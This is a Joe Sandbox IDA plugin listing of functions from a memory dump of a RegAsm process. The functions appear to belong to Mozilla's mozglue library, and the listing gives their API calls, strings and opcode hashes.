Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 309460df255729c32b29cf76dfa9b898ab140914e316f0f79a4bcfcfe1560cf3
Instruction ID: 32e3730577b696665e2da954a4be7b253ab3c8c37a384d03e999f1ee1a4664a5
Opcode Fuzzy Hash: 309460df255729c32b29cf76dfa9b898ab140914e316f0f79a4bcfcfe1560cf3
Instruction Fuzzy Hash: 774188B1F047189BCB08DF79D85125EBBF5EF85348F10863DE859ABB41EB3198448781

Function 6C159830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C15985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C15987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C1598DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C1598D9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: bb80d5697b40361ca578aaa464ac7b2741f06a83dd31adfc7d85595e4b6c45f6
Instruction ID: f648b15b94948775e4e95b39922c40a35d90c40b8faf2a22bcf43ac6c7adda40
Opcode Fuzzy Hash: bb80d5697b40361ca578aaa464ac7b2741f06a83dd31adfc7d85595e4b6c45f6
Instruction Fuzzy Hash: F43138B1B041085FDB14AF5ADC14AEE77A9DF44358F50803DEA1AABB40CB349924CBE1

Function 6C1346E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C134721

Part of subcall function 6C0E4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C123EBD,00000017,?,00000000,?,6C123EBD,?,?,6C0E42D2), ref: 6C0E4444

Strings

profiler-paused, xrefs: 6C1346E4
., xrefs: 6C13476A
-%llu, xrefs: 6C134733

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 791718c5278d81f27ad3b2fc4e57b33c85002a8128907cf8898c698a704c2bf2
Instruction ID: ba8e4d9a577aeaf1393501575cdf01b0f4266925b3bd20ef7da9666558f70a5b
Opcode Fuzzy Hash: 791718c5278d81f27ad3b2fc4e57b33c85002a8128907cf8898c698a704c2bf2
Instruction Fuzzy Hash: 87315971F042189BCB08CF6DD89569DBFE6DB88318F15813DE8099BB41E77498048B90

Function 6C13B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C13B127), ref: 6C13B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C13B4E4

Strings

pid:, xrefs: 6C13B4DE

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: a5964e8c05954e8a41727960af9d8a226ba2a40dc92d92ee8e34d1ba488d40de
Instruction ID: ec675e419ed038e6023c316cea1c15d4df3d4e96972b24fec90015a317ae74ee
Opcode Fuzzy Hash: a5964e8c05954e8a41727960af9d8a226ba2a40dc92d92ee8e34d1ba488d40de
Instruction Fuzzy Hash: 08312331A01628DBCB00DFA9D880AAEB7B5BF0430CF541529D84A67A41E731E949CBA1

Function 6C0EF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132

Strings

SHGetKnownFolderPath, xrefs: 6C0EF12C
shell32, xrefs: 6C0EF11D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 172f60a9c707c0881a745eda70ba3d62b0ed3152af9805ba1077bfdfda552acf
Instruction ID: 57c6a23f4d6afbde24894408d4afa7daaf40d9c000437f08518db23071efa474
Opcode Fuzzy Hash: 172f60a9c707c0881a745eda70ba3d62b0ed3152af9805ba1077bfdfda552acf
Instruction Fuzzy Hash: 8F0148717002199FCB009F6AEC48AAABBF8FF4A754B404529E849E7640D730AA00DBA0

Function 6C12E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C12E577
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C12E5A1, 6C12E5CC, 6C12E5FF, 6C12E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C12E722, 6C12E750, 6C12E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C12E655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C12E826, 6C12E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C12E777

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: c92fb3f0fb24f2e335591f4341b966aba1bd4229b0467e1dfa280ee04f69af2d
Instruction ID: daa00bfdb145d7fd48336ae4da9566d92d68485dc0d0ccbe4b33335861df262b
Opcode Fuzzy Hash: c92fb3f0fb24f2e335591f4341b966aba1bd4229b0467e1dfa280ee04f69af2d
Instruction Fuzzy Hash: D511A136604258DFCB009F2AC848B69BBB4FF89328F000619F89557F50C774A955DB91

Function 6C0F2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0F237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0F2B9C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d3557f20ed44567ee482a6fedba069a6a6ab2446fa78d294d763f470b7b423f2
Instruction ID: 78a8057655505345b707fb50ff66a02b846fde875b203d66a089469b42ec9924
Opcode Fuzzy Hash: d3557f20ed44567ee482a6fedba069a6a6ab2446fa78d294d763f470b7b423f2
Instruction Fuzzy Hash: 3EE159B1A002469FDB08CF59C894B9EBBF2BF88314F198168ED195B745D771E8C6CB90

Function 6C130C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C130CD5

Part of subcall function 6C11F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C130D40
free.MOZGLUE ref: 6C130DCB

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

free.MOZGLUE ref: 6C130DDD
free.MOZGLUE ref: 6C130DF2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 76993fba11f86f43dbd15568cf824465fba9240bcf7d48fb1187d1696c444aea
Instruction ID: 93bb78be8fa200dde25309b0ef771ef1d902438a478f3314f8df584105726364
Opcode Fuzzy Hash: 76993fba11f86f43dbd15568cf824465fba9240bcf7d48fb1187d1696c444aea
Instruction Fuzzy Hash: 0D413B71A187948BD320CF29C04079AFBE5BFD9718F519A2EE8DC87B50D7709484CB82

Function 6C139120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C138242,?,00000000,?,6C12B63F), ref: 6C1391BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C138242,?,00000000,?,6C12B63F), ref: 6C1391EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139219

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 2a856293671a459f7d6b718a8017dad74f28a0127355d7a7919a9d0a4485dd50
Instruction ID: 718af81582bee095252e2b1d6eee4d4500f118da3757b718e1a01ad0f31c7754
Opcode Fuzzy Hash: 2a856293671a459f7d6b718a8017dad74f28a0127355d7a7919a9d0a4485dd50
Instruction Fuzzy Hash: A1314771A00A158FEB10DF6CDC9476A73E5EF91318F514639D89AD7640EF31D818CBA1

Function 6C120800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C120838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C12084C
EnterCriticalSection.KERNEL32(?), ref: 6C1208AF
LeaveCriticalSection.KERNEL32(?), ref: 6C1208BD
LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C1208D5

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 52a6031c6819ab01ab7943b3718e060856a71ef2519417197e3bb67e79c702aa
Instruction ID: 22b446721a5a88e0a5a25b91094f37203f1c2ea3b747e3ca0f906da847cbb5de
Opcode Fuzzy Hash: 52a6031c6819ab01ab7943b3718e060856a71ef2519417197e3bb67e79c702aa
Instruction Fuzzy Hash: FC21B035B012498BEB048F66DC54BBBB779EF45708F500628E509A7B40DB3AA9648BD0

Function 6C13CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CDA4

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

Part of subcall function 6C13D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C13CDBA,00100000,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D158
Part of subcall function 6C13D130: InitializeConditionVariable.KERNEL32(00000098,?,6C13CDBA,00100000,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CDC4

Part of subcall function 6C137480: ReleaseSRWLockExclusive.KERNEL32(?,6C1415FC,?,?,?,?,6C1415FC,?), ref: 6C1374EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CECC

Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2

Part of subcall function 6C12CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C13CEEA,?,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000), ref: 6C12CB57
Part of subcall function 6C12CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C12CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C13CEEA,?,?), ref: 6C12CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D058

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 87ac81be03b24f2703ec48bd0ca92c35a0a3742d354f2f43326defba4528b54b
Instruction ID: 76a90cda116c8295bb22887ffea5cc326923ae13f871970a0c96738071ce7d90
Opcode Fuzzy Hash: 87ac81be03b24f2703ec48bd0ca92c35a0a3742d354f2f43326defba4528b54b
Instruction Fuzzy Hash: 3FD19E71A04B169FD708DF28C490B99F7E1BF89308F01876DD9598B712EB31E9A5CB81

Function 6C0F1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0F17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0F18EE
free.MOZGLUE(?), ref: 6C0F1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0F194C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 67bb341639833b9da346cf0a2b0b514296a87c3010f9ca696fb76d3db8b9f5ab
Instruction ID: ddf00df093d2b24c4ec5901156d0d7e883331c17a0d56b3c5e223863b83581a2
Opcode Fuzzy Hash: 67bb341639833b9da346cf0a2b0b514296a87c3010f9ca696fb76d3db8b9f5ab
Instruction Fuzzy Hash: C881C7B0A153099FCB08CF68D8946AEBBF1FF89314F04452CE825A7754D730E996CBA1

Function 6C105C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C105D40
EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
__aulldiv.LIBCMT ref: 6C105DB4
LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 7ebd9fc157d3dd810806ab9bb776c873c2c174c1798a716536ae264028c222cd
Instruction ID: 0e2757f32934297296d4c80f47c08720bd4d127e8500f45ec1b2db86e24bee77
Opcode Fuzzy Hash: 7ebd9fc157d3dd810806ab9bb776c873c2c174c1798a716536ae264028c222cd
Instruction Fuzzy Hash: 19513D71F001198FDF08CF69C954BBEBBB2FB85304F1A862AD865A7750DB706946CB90

Function 6C147170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C147250
EnterCriticalSection.KERNEL32(6C16F688), ref: 6C147277
__aulldiv.LIBCMT ref: 6C1472C4
LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C1472F7

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 8b9e16d024be8432316524a1d63614e6665eaed268da9e2848bf86a9af23d471
Instruction ID: a35e366fcaf216b00c10f15af21fab27376f76d55caf1c67371fd4df6c5d41ca
Opcode Fuzzy Hash: 8b9e16d024be8432316524a1d63614e6665eaed268da9e2848bf86a9af23d471
Instruction Fuzzy Hash: 25514C71E001298FCF08CFA9C951BBEBBB2FB89314F15862AD825A7750D7316946DBD0

Function 6C0ECDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0ECEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C0ECEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C0ECF4E

Strings

0, xrefs: 6C0ECF30

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 913da50ca6b01e928e1dac8edfbaeb9b25d92fc86e665d8dbfd90c2a7356e8f2
Instruction ID: 853449c030532bef622ad613b543a10218f669f52f0ce2ec7c026c40e3adbfa4
Opcode Fuzzy Hash: 913da50ca6b01e928e1dac8edfbaeb9b25d92fc86e665d8dbfd90c2a7356e8f2
Instruction Fuzzy Hash: 8A51F275A0025A8FCB04CF18C890BAAFBE5EF99300F198599D8595F352D732ED06CBE0

Function 6C12E390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C12E3E4
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C12E4AB

Part of subcall function 6C0F5D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6C12D2DA,00000001), ref: 6C0F5D66

ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E4F5
GetCurrentThreadId.KERNEL32 ref: 6C12E577
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C12E6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C12E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C12E5A1, 6C12E5CC, 6C12E5FF, 6C12E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C12E722, 6C12E750, 6C12E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C12E655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C12E826, 6C12E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C12E777

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: 0d38b6d54d8842564ad414ac595646cf6cad6f052418f987f70bd92e6acf1802
Instruction ID: da36079fece0bdeb61c647e198d32c39686d4505cef5185ad700c7f211bcc5ed
Opcode Fuzzy Hash: 0d38b6d54d8842564ad414ac595646cf6cad6f052418f987f70bd92e6acf1802
Instruction Fuzzy Hash: F1419C78A00646CFCB14CF29C494BAAB7B1FF4A309F10412DD9669BB81D734A995CBD0

